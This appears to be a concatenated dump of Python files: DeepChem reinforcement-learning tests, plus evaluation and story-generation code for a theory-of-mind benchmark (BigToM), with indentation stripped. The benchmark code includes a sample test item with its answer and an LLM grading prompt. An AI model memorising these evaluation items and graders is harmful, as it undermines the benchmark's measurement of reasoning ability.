def step(self, action):
self._state = np.random.random(10)
return 0.0
def reset(self):
pass
# The policy includes a single recurrent layer.
class TestPolicy(dc.rl.Policy):
def __init__(self):
super(TestPolicy, self).__init__(['action_prob', 'value', 'rnn_state'],
[np.zeros(10)])
def create_model(self, **kwargs):
state = Input(shape=(10,))
rnn_state = Input(shape=(10,))
reshaped = Reshape((1, 10))(state)
gru, rnn_final_state = GRU(
10, return_state=True, return_sequences=True)(
reshaped, initial_state=rnn_state)
output = Softmax()(Reshape((10,))(gru))
value = dc.models.layers.Variable([0.0])([])
return tf.keras.Model(
inputs=[state, rnn_state], outputs=[output, value, rnn_final_state])
# We don't care about actually optimizing it, so just run a few rollouts to make
# sure fit() doesn't crash, then check the behavior of the GRU state.
env = TestEnvironment()
ppo = dc.rl.PPO(env, TestPolicy(), batch_size=0)
ppo.fit(100)
# On the first call, the initial state should be all zeros.
prob1, value1 = ppo.predict(
env.state, use_saved_states=True, save_states=False)
# It should still be zeros since we didn't save it last time.
prob2, value2 = ppo.predict(
env.state, use_saved_states=True, save_states=True)
# It should be different now.
prob3, value3 = ppo.predict(
env.state, use_saved_states=True, save_states=False)
# This should be the same as the previous one.
prob4, value4 = ppo.predict(
env.state, use_saved_states=True, save_states=False)
# Now we reset it, so we should get the same result as initially.
prob5, value5 = ppo.predict(
env.state, use_saved_states=False, save_states=True)
assert np.array_equal(prob1, prob2)
assert np.array_equal(prob1, prob5)
assert np.array_equal(prob3, prob4)
assert not np.array_equal(prob2, prob3)
@attr('slow')
def test_hindsight(self):
"""Test Hindsight Experience Replay."""
# The environment is a plane in which the agent moves by steps until it reaches a randomly
# positioned goal. No reward is given until it reaches the goal. That makes it very hard
# to learn by standard methods, since it may take a very long time to receive any feedback
# at all. Using hindsight makes it much easier.
class TestEnvironment(dc.rl.Environment):
def __init__(self):
super(TestEnvironment, self).__init__((4,), 4)
self.moves = [(-1, 0), (1, 0), (0, -1), (0, 1)]
def reset(self):
self._state = np.concatenate([[0, 0], np.random.randint(-50, 50, 2)])
self._terminated = False
self.count = 0
def step(self, action):
new_state = self._state.copy()
new_state[:2] += self.moves[action]
self._state = new_state
self.count += 1
reward = 0
if np.array_equal(new_state[:2], new_state[2:]):
self._terminated = True
reward = 1
elif self.count == 1000:
self._terminated = True
return reward
def apply_hindsight(self, states, actions, goal):
new_states = []
rewards = []
goal_pos = goal[:2]
for state, action in zip(states, actions):
new_state = state.copy()
new_state[2:] = goal_pos
new_states.append(new_state)
pos_after_action = new_state[:2] + self.moves[action]
if np.array_equal(pos_after_action, goal_pos):
rewards.append(1)
else:
rewards.append(0)
return new_states, rewards
# A simple policy with two hidden layers.
class TestPolicy(dc.rl.Policy):
def __init__(self):
super(TestPolicy, self).__init__(['action_prob', 'value'])
def create_model(self, **kwargs):
state = Input(shape=(4,))
dense1 = Dense(6, activation=tf.nn.relu)(state)
dense2 = Dense(6, activation=tf.nn.relu)(dense1)
output = Dense(4, activation=tf.nn.softmax, use_bias=False)(dense2)
value = Dense(1)(dense2)
return tf.keras.Model(inputs=state, outputs=[output, value])
# Optimize it.
env = TestEnvironment()
learning_rate = PolynomialDecay(
initial_rate=0.0001, final_rate=0.00005, decay_steps=1500000)
ppo = dc.rl.PPO(
env,
TestPolicy(),
use_hindsight=True,
optimization_epochs=8,
optimizer=Adam(learning_rate=learning_rate))
ppo.fit(1500000)
# Try running it a few times and see if it succeeds.
pass_count = 0
for i in range(5):
env.reset()
while not env.terminated:
env.step(ppo.select_action(env.state))
if np.array_equal(env.state[:2], env.state[2:]):
pass_count += 1
assert pass_count >= 3
| [] |
2024-01-10 | gruns/deepchem | contrib~rl~test_mcts.py | from flaky import flaky
import deepchem as dc
from deepchem.models.tensorgraph.layers import Reshape, Variable, SoftMax, GRU, Dense
from deepchem.models.optimizers import Adam, PolynomialDecay
import numpy as np
import tensorflow as tf
import unittest
from nose.plugins.attrib import attr
class TestMCTS(unittest.TestCase):
@flaky
def test_roulette(self):
"""Test training a policy for the roulette environment."""
# This is modeled after the Roulette-v0 environment from OpenAI Gym.
# The player can bet on any number from 0 to 36, or walk away (which ends the
# game). The average reward for any bet is slightly negative, so the best
# strategy is to walk away.
class RouletteEnvironment(dc.rl.Environment):
def __init__(self):
super(RouletteEnvironment, self).__init__([(1,)], 38)
self._state = [np.array([0])]
def step(self, action):
if action == 37:
self._terminated = True # Walk away.
return 0.0
wheel = np.random.randint(37)
if wheel == 0:
if action == 0:
return 35.0
return -1.0
if action != 0 and wheel % 2 == action % 2:
return 1.0
return -1.0
def reset(self):
self._terminated = False
env = RouletteEnvironment()
# This policy just learns a constant probability for each action, and a constant for the value.
class TestPolicy(dc.rl.Policy):
def create_layers(self, state, **kwargs):
action = Variable(np.ones(env.n_actions))
output = SoftMax(
in_layers=[Reshape(in_layers=[action], shape=(-1, env.n_actions))])
value = Variable([0.0])
return {'action_prob': output, 'value': value}
# Optimize it.
mcts = dc.rl.MCTS(
env,
TestPolicy(),
max_search_depth=5,
n_search_episodes=200,
optimizer=Adam(learning_rate=0.005))
mcts.fit(10, steps_per_iteration=50, epochs_per_iteration=50)
# It should have learned that the expected value is very close to zero, and that the best
# action is to walk away.
action_prob, value = mcts.predict([[0]])
assert -0.5 < value[0] < 0.5
assert action_prob.argmax() == 37
assert mcts.select_action([[0]], deterministic=True) == 37
# Verify that we can create a new MCTS object, reload the parameters from the first one, and
# get the same result.
new_mcts = dc.rl.MCTS(env, TestPolicy(), model_dir=mcts._graph.model_dir)
new_mcts.restore()
action_prob2, value2 = new_mcts.predict([[0]])
assert value2 == value
# Do the same thing, only using the "restore" argument to fit().
new_mcts = dc.rl.MCTS(env, TestPolicy(), model_dir=mcts._graph.model_dir)
new_mcts.fit(0, restore=True)
action_prob2, value2 = new_mcts.predict([[0]])
assert value2 == value
| [] |
2024-01-10 | cicl-stanford/procedural-evals-tom | code~src~crfm_chat_llm.py | """
requires crfm-helm v0.2.3
currently only available via pip install crfm-helm@git+https://github.com/stanford-crfm/helm.git@main
"""
from typing import (
Any,
Dict,
List,
Mapping,
Optional,
Union,
Tuple,
)
import os
from helm.common.authentication import Authentication
from helm.common.request import Request, RequestResult
from helm.proxy.services.remote_service import RemoteService
import asyncio
from functools import partial
from langchain.callbacks.manager import (
AsyncCallbackManagerForLLMRun,
CallbackManagerForLLMRun,
)
from langchain.schema import (
AIMessage,
BaseMessage,
ChatMessage,
ChatGeneration,
ChatResult,
HumanMessage,
SystemMessage,
)
from langchain.chat_models.base import SimpleChatModel
def _convert_message_to_dict(message: BaseMessage) -> dict:
if isinstance(message, ChatMessage):
message_dict = {"role": message.role, "content": message.content}
elif isinstance(message, HumanMessage):
message_dict = {"role": "user", "content": message.content}
elif isinstance(message, AIMessage):
message_dict = {"role": "assistant", "content": message.content}
elif isinstance(message, SystemMessage):
message_dict = {"role": "system", "content": message.content}
else:
raise ValueError(f"Got unknown type {message}")
if "name" in message.additional_kwargs:
message_dict["name"] = message.additional_kwargs["name"]
return message_dict
class crfmChatLLM(SimpleChatModel):
"""Wrapper around crfm chat language models.
To use, you should have the ``crfm-helm`` python package installed, and the
environment variable ``CRFM_API_KEY`` set with your API key.
Any parameters that are valid to be passed to the openai.create call can be passed
in, even if not explicitly saved on this class.
Example:
.. code-block:: python
from crfm_chat_llm import crfmChatLLM
chat = crfmChatLLM(model_name="openai/gpt-4-0314")
system_message = SystemMessage(content="You are a helpful AI Assistant.")
human_message_0 = HumanMessage(content="Tell me a joke")
assistant_message_0 = AIMessage(content="What do you call a cat that can do magic tricks? A magic kit.")
human_message_1 = HumanMessage(content="This joke was not funny, tell me one about dogs.")
messages = [
system_message,
human_message_0,
assistant_message_0,
human_message_1,
]
response = chat.generate([messages], stop=["System:"])
"""
client: Any #: :meta private:
model_name: str = "openai/gpt-4-0314"
"""Model name to use."""
temperature: float = 0.7
"""What sampling temperature to use."""
max_tokens: int = 200
"""The maximum number of tokens to generate in the completion.
-1 returns as many tokens as possible given the prompt and
the models maximal context size."""
top_p: float = 1
"""Total probability mass of tokens to consider at each step."""
frequency_penalty: float = 0
"""Penalizes repeated tokens according to frequency."""
presence_penalty: float = 0
"""Penalizes repeated tokens."""
num_completions: int = 1
"""How many completions to generate for each prompt."""
top_k_per_token: int = 1
"""number of candidates per token position in each completion"""
crfm_api_key: Optional[str] = None
"""api key."""
max_retries: int = 5
"""Maximum number of retries to make when generating."""
echo_prompt: bool = False
"""Whether to echo the prompt in the response."""
verbose: bool = True
"""Whether to print out the prompt and response"""
messages: Optional[List[BaseMessage]]
"""Used for chat models. (OpenAI only for now).
if messages is specified for a chat model, the prompt is ignored.
Otherwise, the client should convert the prompt into a message."""
request_timeout: Optional[Union[float, Tuple[float, float]]] = None
"""Timeout for requests to OpenAI completion API. Default is 600 seconds."""
streaming: bool = False
"""Whether to stream the results or not."""
@property
def _llm_type(self) -> str:
return "CRFM"
def _generate(
self,
messages: List[BaseMessage],
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
) -> ChatResult:
message_dicts = [_convert_message_to_dict(m) for m in messages]
output_str = self._call(message_dicts, stop=stop, run_manager=run_manager)
message = AIMessage(content=output_str)
generation = ChatGeneration(message=message)
return ChatResult(generations=[generation])
def _call(self,
messages: List[BaseMessage],
stop: Optional[List[str]] = [],
run_manager: Optional[CallbackManagerForLLMRun] = None,
) -> str:
# get api key from environment
if self.crfm_api_key is None:
self.crfm_api_key = os.getenv("CRFM_API_KEY")
auth = Authentication(api_key=self.crfm_api_key)
service = RemoteService("https://crfm-models.stanford.edu")
# Make a request
tries = 0
result = None
while tries < self.max_retries:
try:
tries += 1
if self.verbose:
print(messages)
request = Request(model=self.model_name,
messages=messages,
temperature=self.temperature,
max_tokens=self.max_tokens,
top_p=self.top_p,
frequency_penalty=self.frequency_penalty,
presence_penalty=self.presence_penalty,
num_completions=self.num_completions,
top_k_per_token=self.top_k_per_token,
stop_sequences=stop,
)
request_result: RequestResult = service.make_request(auth, request)
result = request_result.completions[0].text
if self.verbose:
print('------------------')
print(result)
except Exception as e:
print(f"Error: {e}, retrying... ({tries}/{self.max_retries})")
continue
break
assert result is not None
return result
@property
def _identifying_params(self) -> Mapping[str, Any]:
"""Get the identifying parameters."""
return {**{"model_name": self.model_name}, **self._default_params}
@property
def _default_params(self) -> Dict[str, Any]:
"""Get the default parameters for calling OpenAI API."""
return {
"model": self.model_name,
"request_timeout": self.request_timeout,
"max_tokens": self.max_tokens,
"stream": self.streaming,
"n": self.num_completions,
"temperature": self.temperature,
}
async def _agenerate(
self,
messages: List[BaseMessage],
stop: Optional[List[str]] = None,
run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
) -> ChatResult:
func = partial(self._generate, messages, stop=stop, run_manager=run_manager)
return await asyncio.get_event_loop().run_in_executor(None, func) | [
"False"
] |
2024-01-10 | cicl-stanford/procedural-evals-tom | code~src~evaluate_llm.py | from langchain.prompts import PromptTemplate
from langchain.chains.llm import LLMChain
from langchain.chat_models import ChatOpenAI
from langchain.schema import (
AIMessage,
HumanMessage,
SystemMessage
)
PROMPT_DIR = '../prompt_instructions'
ONE_SHOT = {'story': 'Kofi is a fisherman from a small village in Ghana. He wants to catch enough fish today to provide for his family and sell the surplus at the market. Kofi repaired his fishing net last night. While Kofi is away from his boat, a group of monkeys comes and plays with the fishing net, tearing it apart. Kofi does not see the monkeys damaging his fishing net.',
'question': 'Does Kofi believe his fishing net is in good condition or torn apart?\nChoose one of the following:\na)Kofi believes his fishing net is in good condition.\nb)Kofi believes his fishing net is torn apart.',
'answer': 'a)Kofi believes his fishing net is in good condition.',
'thought': 'Let\'s think step by step:\n1) Kofi repaired his fishing net last night. So last night he believes that his net is fixed.\n2) While Kofi is away from his boat, a group of monkeys comes and plays with the fishing net, tearing it apart.\n3) Kofi does not see the monkeys damaging his fishing net. So, his belief about his net stays the same. He thinks that it is fixed.\n4) Does Kofi believe his fishing net is in good condition or torn apart?\n5) Kofi believes his fishing net is in good condition.'}
ONE_SHOT_CHAT = [HumanMessage(content="Story: {story}\nQuestion: {question}".format(story=ONE_SHOT['story'], question=ONE_SHOT['question'])), AIMessage(content="Answer: {answer}".format(answer=ONE_SHOT['answer']))]
ONE_SHOT_CHAT_COT = [HumanMessage(content="Story: {story}\nQuestion: {question}".format(story=ONE_SHOT['story'], question=ONE_SHOT['question'])), AIMessage(content="Thought: {thought}\nAnswer: {answer}".format(answer=ONE_SHOT['answer'], thought=ONE_SHOT['thought']))]
def parse_chat_response(response):
answer_idx = response.find('Answer:')
return response[answer_idx+8:].strip()
class EvaluateLLM():
def __init__(self, llm, method='0shot'):
self.llm = llm
self.instruction = None
self.method = method
if method == '0shot':
# predict answer
self.stop_tokens = ["Story:", "Question:"]
with(open(f'{PROMPT_DIR}/evaluate.txt', 'r')) as f:
self.instruction = f.read()
self.prompt = """{instruction}
Story: {story}
Question: {question}
Answer:"""
elif method == '1shot':
# predict answer
self.stop_tokens = ["Story:", "Question:"]
with(open(f'{PROMPT_DIR}/evaluate.txt', 'r')) as f:
self.instruction = f.read()
one_shot = "Story: {story}\nQuestion: {question}\nAnswer: {answer}".format(story=ONE_SHOT['story'], question=ONE_SHOT['question'], answer=ONE_SHOT['answer'])
self.prompt = "{instruction}" + "\n" + one_shot + "\n" + """
Story: {story}
Question: {question}
Answer:"""
elif method == '0shot-cot':
self.stop_tokens = ["Story:", "Question:", "Answer:"]
with(open(f'{PROMPT_DIR}/evaluate_cot.txt', 'r')) as f:
self.instruction = f.read()
self.prompt = """{instruction}
Story: {story}
Question: {question}
Thought: Let's think step by step:"""
elif method == '1shot-cot':
self.stop_tokens = ["Story:", "Question:", "Answer:"]
with(open(f'{PROMPT_DIR}/evaluate_cot.txt', 'r')) as f:
self.instruction = f.read()
one_shot = "Story: {story}\nQuestion: {question}\nThought: {thought}\nWrite the answer as <option>) <answer>\nAnswer: {answer}".format(story=ONE_SHOT['story'], question=ONE_SHOT['question'], answer=ONE_SHOT['answer'], thought=ONE_SHOT['thought'])
self.prompt = """{instruction}
Story: {story}
Question: {question}
Thought: Let's think step by step:"""
elif method == 'chat-0shot' or method == 'chat-1shot':
with open(f'{PROMPT_DIR}/evaluate.txt', 'r') as f:
self.instruction = f.read()
self.prompt = """Story: {story}\nQuestion: {question}"""
elif method == 'chat-0shot-cot' or method == 'chat-1shot-cot':
with open(f'{PROMPT_DIR}/evaluate_cot_chat.txt', 'r') as f:
self.instruction = f.read()
self.prompt = """Story: {story}\nQuestion: {question}"""
elif method == 'eval':
# grade answer
self.stop_tokens = ["Predicted Answer:", "True Answer:", "Response:"]
with(open(f'{PROMPT_DIR}/grade.txt', 'r')) as f:
self.instruction = f.read()
self.prompt = """{instruction}
Here is the question:
{query}
Here is the true answer:
{true_answer}
Here is the false answer:
{wrong_answer}
Here is the predicted answer:
{predicted_answer}
Is the predicted answer close to the true answer compared to the false answer? Answer True or False.
A:"""
else:
raise ValueError(f"method {method} not supported")
def predict_answer(self, story, question):
if 'chat' in self.method:
prompt = [SystemMessage(content=self.instruction)]
if self.method == 'chat-1shot':
prompt += ONE_SHOT_CHAT
elif self.method == 'chat-1shot-cot':
prompt += ONE_SHOT_CHAT_COT
prompt += [HumanMessage(content=self.prompt.format(story=story, question=question))]
response = self.llm.generate([prompt])
response = response.generations[0][0].text
elif 'cot' not in self.method:
prompt = self.prompt.format(instruction=self.instruction, story=story, question=question)
response = self.llm(prompt=prompt, stop=self.stop_tokens)
else:
prompt = self.prompt.format(instruction=self.instruction, story=story, question=question)
self.llm.max_tokens = 200
thought = self.llm(prompt=prompt, stop=self.stop_tokens)
self.llm.max_tokens = 30
prompt = prompt + thought + "\nWrite the answer as <option>) <answer>\nAnswer:"
response = self.llm(prompt=prompt, stop=self.stop_tokens)
return response
def grade_answer(self, query, predicted_answer, true_answer, wrong_answer):
prompt = self.prompt.format(instruction=self.instruction, query=query, wrong_answer=wrong_answer, predicted_answer=predicted_answer, true_answer=true_answer)
response = self.llm(prompt=prompt, stop=self.stop_tokens)
return response | [
"Answer: PLACEHOLDER",
"Story: PLACEHOLDER\nQuestion: PLACEHOLDER",
"../prompt_instructions",
"prompt5b204a7b-2f18-494d-8e32-b441303db71bPLACEHOLDER\nWrite the answer as <option>) <answer>\nAnswer:PLACEHOLDER\nWrite the answer as <option>) <answer>\nAnswer:",
"Thought: PLACEHOLDER\nAnswer: PLACEHOLDER"
] |
2024-01-10 | cicl-stanford/procedural-evals-tom | code~src~evaluate_conditions.py | import os
import random
import csv
import tqdm
import argparse
from crfm_llm import crfmLLM
from evaluate_llm import EvaluateLLM
from langchain.chat_models import ChatOpenAI, ChatAnthropic
from langchain import HuggingFaceHub, HuggingFacePipeline
from langchain.llms import LlamaCpp
from evaluate_llm import parse_chat_response
DATA_DIR = '../../data'
MODEL_DIR = 'llama.cpp/models'
CONDITION_DIR = os.path.join(DATA_DIR, 'conditions')
RESULTS_DIR = os.path.join(DATA_DIR, 'results')
PROMPT_DIR = '../prompt_instructions'
random.seed(0)
def evaluate_condition(eval_model, model_name, temperature, method,
init_belief, variable, condition, num_probs,
max_tokens, verbose, mcq, offset):
if 'openai' in model_name:
llm = crfmLLM(model_name=model_name, temperature=temperature, max_tokens=max_tokens, verbose=False)
elif 'llama' in model_name:
if 'llama-65' in model_name:
llm = LlamaCpp(model_path=f"{MODEL_DIR}/65B/ggml-model-q5_1.bin", n_ctx=1536, max_tokens=max_tokens, temperature=temperature, n_threads=16, n_batch=16)
elif 'llama-33' in model_name:
llm = LlamaCpp(model_path=f"{MODEL_DIR}/33B/ggml-model-q5_1.bin", n_ctx=1536, max_tokens=max_tokens, temperature=temperature, n_threads=16, n_batch=16)
elif 'llama-13' in model_name:
llm = LlamaCpp(model_path=f"{MODEL_DIR}/13B/ggml-model-q5_1.bin", n_ctx=1536, max_tokens=max_tokens, temperature=temperature, n_threads=16, n_batch=16)
elif 'llama-7' in model_name:
llm = LlamaCpp(model_path=f"{MODEL_DIR}/7B/ggml-model-q5_1.bin", n_ctx=1536, max_tokens=max_tokens, temperature=temperature, n_threads=16, n_batch=16)
# repo_id = "decapoda-research/llama-65b-hf"
# llm = HuggingFacePipeline.from_model_id(model_id=repo_id, task="text-generation", model_kwargs={"temperature":temperature, "max_new_tokens":max_tokens})
# llm = HuggingFaceHub(repo_id=repo_id, model_kwargs={"temperature":temperature, "max_length":max_tokens})
elif model_name in ['gpt-4', 'gpt-3.5-turbo']:
llm = ChatOpenAI(
model=model_name,
temperature=temperature,
max_tokens=max_tokens,
n=1,
request_timeout=180
)
elif model_name in ['claude-v1.3', 'claude-instant-v1.1']:
llm = ChatAnthropic(
model=model_name,
temperature=temperature,
max_tokens_to_sample=max_tokens,
)
else:
raise ValueError(f"Model {model_name} not supported")
test_model = EvaluateLLM(llm, method=method)
if 'openai' in eval_model:
eval_llm = crfmLLM(model_name=eval_model, temperature=0, max_tokens=10, verbose=False)
eval_model = EvaluateLLM(eval_llm, method='eval')
# load condition csv
csv_name = os.path.join(CONDITION_DIR, f'{init_belief}_{variable}_{condition}/stories.csv')
with open(csv_name, "r") as f:
reader = csv.reader(f, delimiter=";")
condition_rows = list(reader)
predicted_answers = []
graded_answers = []
for row in tqdm.tqdm(condition_rows[offset:num_probs]):
story = row[0]
question_orig = row[1]
question = row[1]
true_answer, wrong_answer = row[2], row[3]
answers = [true_answer, wrong_answer]
random.shuffle(answers)
if mcq:
question = f"{question}\nChoose one of the following:\na){answers[0]}\nb){answers[1]}"
predicted_answer = test_model.predict_answer(story, question).strip()
if verbose:
print(f"story: {story}")
print(f"question: {question}")
print(f"true answer: {true_answer}")
print(f"wrong answer: {wrong_answer}")
print(f"predicted answer: {predicted_answer}")
if answers[0] == true_answer:
answer_key = 'a)'
negative_answer_key = 'b)'
true_answer = 'a) ' + true_answer
wrong_answer = 'b) ' + wrong_answer
else:
answer_key = 'b)'
negative_answer_key = 'a)'
true_answer = 'b) ' + true_answer
wrong_answer = 'a) ' + wrong_answer
if mcq:
predicted_answer_parsed = predicted_answer
if method == 'chat-0shot-cot':
predicted_answer_parsed = parse_chat_response(predicted_answer)
if answer_key in predicted_answer_parsed.lower():
graded_answer = 'True'
elif negative_answer_key in predicted_answer_parsed.lower():
graded_answer = 'False'
else:
print(f"predicted answer: {predicted_answer}")
print(f"true answer: {true_answer}")
print(f"wrong answer: {wrong_answer}")
# user_grade = input("Please grade the answer (True:1/False:0): ")
# graded_answer = True if user_grade == '1' else False
graded_answer = eval_model.grade_answer(question_orig, predicted_answer_parsed, true_answer, wrong_answer).strip()
print(f"graded answer: {graded_answer}")
else:
if method == 'chat-0shot-cot':
predicted_answer_parsed = parse_chat_response(predicted_answer)
graded_answer = eval_model.grade_answer(question_orig, predicted_answer_parsed, true_answer, wrong_answer).strip()
else:
graded_answer = eval_model.grade_answer(question_orig, predicted_answer, true_answer, wrong_answer).strip()
predicted_answers.append(predicted_answer)
graded_answers.append(graded_answer)
if verbose:
print(f"graded answer: {graded_answer}")
# save results
model_name = model_name.replace('/', '_')
prediction = os.path.join(RESULTS_DIR, f'{init_belief}_{variable}_{condition}/prediction_{model_name}_{temperature}_{method}_{variable}_{condition}_{offset}_{num_probs}.csv')
accuracy_file = os.path.join(RESULTS_DIR, f'{init_belief}_{variable}_{condition}/accuracy_{model_name}_{temperature}_{method}_{variable}_{condition}_{offset}_{num_probs}.csv')
if not os.path.exists(os.path.join(RESULTS_DIR, f'{init_belief}_{variable}_{condition}')):
os.makedirs(os.path.join(RESULTS_DIR, f'{init_belief}_{variable}_{condition}'))
with open(prediction, "w") as f:
writer = csv.writer(f, delimiter=";")
# write a new row per element in predicted answers
for predicted_answer in predicted_answers:
writer.writerow([predicted_answer])
with open(accuracy_file, "w") as f:
writer = csv.writer(f, delimiter=";")
# write a new row per element in graded answers
for graded_answer in graded_answers:
writer.writerow([graded_answer])
# accuracy
accuracy = graded_answers.count('True') / len(graded_answers)
# Print results
print("\n------------------------")
print(" RESULTS ")
print("------------------------")
print(f"MODEL: {model_name}, Temperature: {temperature}, Method: {method}")
print(f"CONDITION: {init_belief} {variable}, {condition}")
print(f"ACCURACY: {accuracy:.2%}")
print("------------------------\n")
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--variable', type=str, default='belief')
parser.add_argument('--condition', type=str, default='true_belief')
parser.add_argument('--eval_model', type=str, default='openai/text-davinci-003')
parser.add_argument('--model_name', type=str, default='openai/text-davinci-003')
parser.add_argument('--temperature', type=float, default=0.0)
parser.add_argument('--num_probs', '-n', type=int, default=1)
parser.add_argument('--offset', '-o', type=int, default=0)
parser.add_argument('--max_tokens', type=int, default=100)
parser.add_argument('--method', type=str, default='0shot')
parser.add_argument('--init_belief', type=str, default="0_backward")
parser.add_argument('--verbose', '-v', action='store_true')
parser.add_argument('--mcq', action='store_true')
args = parser.parse_args()
evaluate_condition(args.eval_model, args.model_name, args.temperature,
args.method, args.init_belief, args.variable,
args.condition, args.num_probs, args.max_tokens, args.verbose, args.mcq, args.offset)
if __name__ == '__main__':
main() | [
"../prompt_instructions"
] |
2024-01-10 | cicl-stanford/procedural-evals-tom | code~src~bigtom.py | import random
import csv
import tqdm
import argparse
from langchain.chat_models import ChatOpenAI
from langchain.schema import (
AIMessage,
HumanMessage,
SystemMessage
)
from utils import push_data, get_num_items, get_vars_from_out
letters = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L'
'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W','X', 'Y', 'Z']
DATA_DIR = '../../data'
PROMPT_DIR = '../prompt_instructions'
REPO_URL = 'https://github.com/cicl-stanford/marple_text'
CSV_NAME = 'bigtom/bigtom'
parser = argparse.ArgumentParser()
parser.add_argument('--model', type=str, default='gpt-4', help='model name')
parser.add_argument('--temperature', type=float, default=0.5, help='temperature')
parser.add_argument('--max_tokens', type=int, default=450, help='max tokens')
# change num completions to 10
parser.add_argument('--num_completions', type=int, default=1, help='number of completions')
parser.add_argument('--num_shots', type=int, default=3, help='number of shots')
parser.add_argument('--num_stories', type=int, default=1, help='number of stories to generate')
parser.add_argument('--verbose', action='store_true', help='verbose')
def get_llm(args):
llm = ChatOpenAI(
model=args.model,
temperature=args.temperature,
max_tokens=args.max_tokens,
n=args.num_completions,
request_timeout=180
)
return llm
def gen_chat(args):
response_template = """Here is the story:
Story: {story}
Aware of event: {awarenes}
Not aware of event: {not_aware}
Action given new state: {action_new}
Action given initial state: {action_init}
Belief Question: {belief_question}
Desire Question: {desire_question}
Action Question: {action_question}
Belief Aware: {belief_answer_aware}
Desire Aware: {desire_answer_aware}
Action Aware: {action_answer_aware}
Belief not Aware: {belief_answer_not_aware}
Desire not Aware: {desire_answer_not_aware}
Action not Aware: {action_answer_not_aware}
Random Event: {random_event}
Aware of random event: {aware_of_random_event}
Not aware of random event: {not_aware_of_random_event}"""
llm = get_llm(args)
with(open(f'{PROMPT_DIR}/bigtom.txt', 'r')) as f:
instruction_text = f.read()
system_message = SystemMessage(content=instruction_text)
# 2-shots by default
human_message_0 = HumanMessage(content='Generate a story')
letter = random.choice(letters)
human_message_1 = HumanMessage(content=f'Generate another story, using a different context, object states, and names than the examples did. The name must start with {letter}.')
examples = []
template_var = ["story", "awarenes", "not_aware", "action_new", "action_init", "belief_question", "desire_question", "action_question",
"belief_answer_aware", "desire_answer_aware", "action_answer_aware", "belief_answer_not_aware", "desire_answer_not_aware",
"action_answer_not_aware", "random_event", "aware_of_random_event", "not_aware_of_random_event"]
csv_file = f'{DATA_DIR}/{CSV_NAME}.csv'
prompt_tokens_used = 0
completion_tokens_used = 0
# run loop with n stories, increase by num_completions
for n_story in tqdm.tqdm(range(0, args.num_stories, args.num_completions)):
letter = random.choice(letters)
human_message_1 = HumanMessage(content=f'Generate another story, using a different context, object states, and names than the examples did. The name must start with {letter}.')
# read examples from csv file every iteration to add generated samples to the pool of seed examples
if args.verbose:
print(f"Reading examples from {csv_file} with existing {get_num_items(csv_file)} examples")
# read a few examples from the csv file
with open(csv_file, 'r') as f:
for line in f.readlines():
params = line.split(';')
example = {k: params[v].strip() for v, k in enumerate(template_var)}
examples.append(example)
random.shuffle(examples)
# 3-shots by default
messages = [system_message]
for i in range(args.num_shots):
messages.append(human_message_0)
messages.append(AIMessage(content=response_template.format(**examples[i])))
messages.append(human_message_1)
if args.verbose:
print(f"------ messages ------")
print(messages)
responses = llm.generate([messages])
prompt_tokens_used += responses.llm_output['token_usage']['prompt_tokens']
completion_tokens_used += responses.llm_output['token_usage']['completion_tokens']
price = (prompt_tokens_used * 0.03 + completion_tokens_used * 0.06) / 1000.
# update tqdm progress bar with price
tqdm.tqdm.write(f"Price: {price:.2f} USD, Price per story: {price/(n_story+args.num_completions):.2f} USD")
for g, generation in enumerate(responses.generations[0]):
# TODO: account for multiple completions
if args.verbose:
print(f"------ Generated Story {n_story+g} ------")
print(generation.text)
print("------------ Fin --------------")
list_var = ["Story", "Aware of event", "Not aware of event", "Action given new state", "Action given initial state", "Belief Question", "Desire Question", "Action Question",
"Belief Aware", "Desire Aware", "Action Aware", "Belief not Aware",
"Desire not Aware", "Action not Aware", "Random Event", "Aware of random event", "Not aware of random event"]
out_vars = get_vars_from_out(generation.text, list_var)
data = [out_vars[k] for k in list_var]
data += ["auto", 0]
# write to csv file
story_file = f'{DATA_DIR}/{CSV_NAME}.csv'
with open(story_file, 'a') as csvfile:
writer = csv.writer(csvfile, delimiter=';')
writer.writerow(data)
# push to github
# push_data(DATA_DIR, REPO_URL)
if __name__ == "__main__":
args = parser.parse_args()
print(f"Generating {args.num_stories} stories")
if args.verbose:
print(args)
gen_chat(args) | [
"0",
"token_usage",
"../prompt_instructions",
"Generate a story",
"['story', 'awarenes', 'not_aware', 'action_new', 'action_init', 'belief_question', 'desire_question', 'action_question', 'belief_answer_aware', 'desire_answer_aware', 'action_answer_aware', 'belief_answer_not_aware', 'desire_answer_not_aware', 'action_answer_not_aware', 'random_event', 'aware_of_random_event', 'not_aware_of_random_event']",
"Here is the story:\nStory: {story}\nAware of event: {awarenes}\nNot aware of event: {not_aware}\nAction given new state: {action_new}\nAction given initial state: {action_init}\nBelief Question: {belief_question}\nDesire Question: {desire_question}\nAction Question: {action_question}\nBelief Aware: {belief_answer_aware}\nDesire Aware: {desire_answer_aware}\nAction Aware: {action_answer_aware}\nBelief not Aware: {belief_answer_not_aware}\nDesire not Aware: {desire_answer_not_aware}\nAction not Aware: {action_answer_not_aware}\nRandom Event: {random_event}\nAware of random event: {aware_of_random_event}\nNot aware of random event: {not_aware_of_random_event}",
"Generate another story, using a different context, object states, and names than the examples did. The name must start with PLACEHOLDER.",
"prompt_tokens"
] |
2024-01-10 | cicl-stanford/procedural-evals-tom | code~src~crfm_llm.py | import os
import logging
import sys
from typing import (
Any,
Callable,
Dict,
Generator,
List,
Mapping,
Optional,
Set,
Tuple,
Union,
)
from pydantic import BaseModel, Extra, Field, root_validator
from langchain.llms.base import BaseLLM
from langchain.schema import Generation, LLMResult
from langchain.utils import get_from_dict_or_env
from helm.common.authentication import Authentication
from helm.common.perspective_api_request import PerspectiveAPIRequest, PerspectiveAPIRequestResult
from helm.common.request import Request, RequestResult
from helm.common.tokenization_request import TokenizationRequest, TokenizationRequestResult
from helm.proxy.accounts import Account
from helm.proxy.services.remote_service import RemoteService
from langchain.llms.base import LLM
from typing import Optional, List, Mapping, Any
class crfmLLM(LLM):
"""Wrapper around crfm large language models.
To use, you should have the ``crfm-helm`` python package installed, and the
environment variable ``CRFM_API_KEY`` set with your API key.
Any parameters that are valid to be passed to the openai.create call can be passed
in, even if not explicitly saved on this class.
Example:
.. code-block:: python
from crfm_llm import crfmLLM
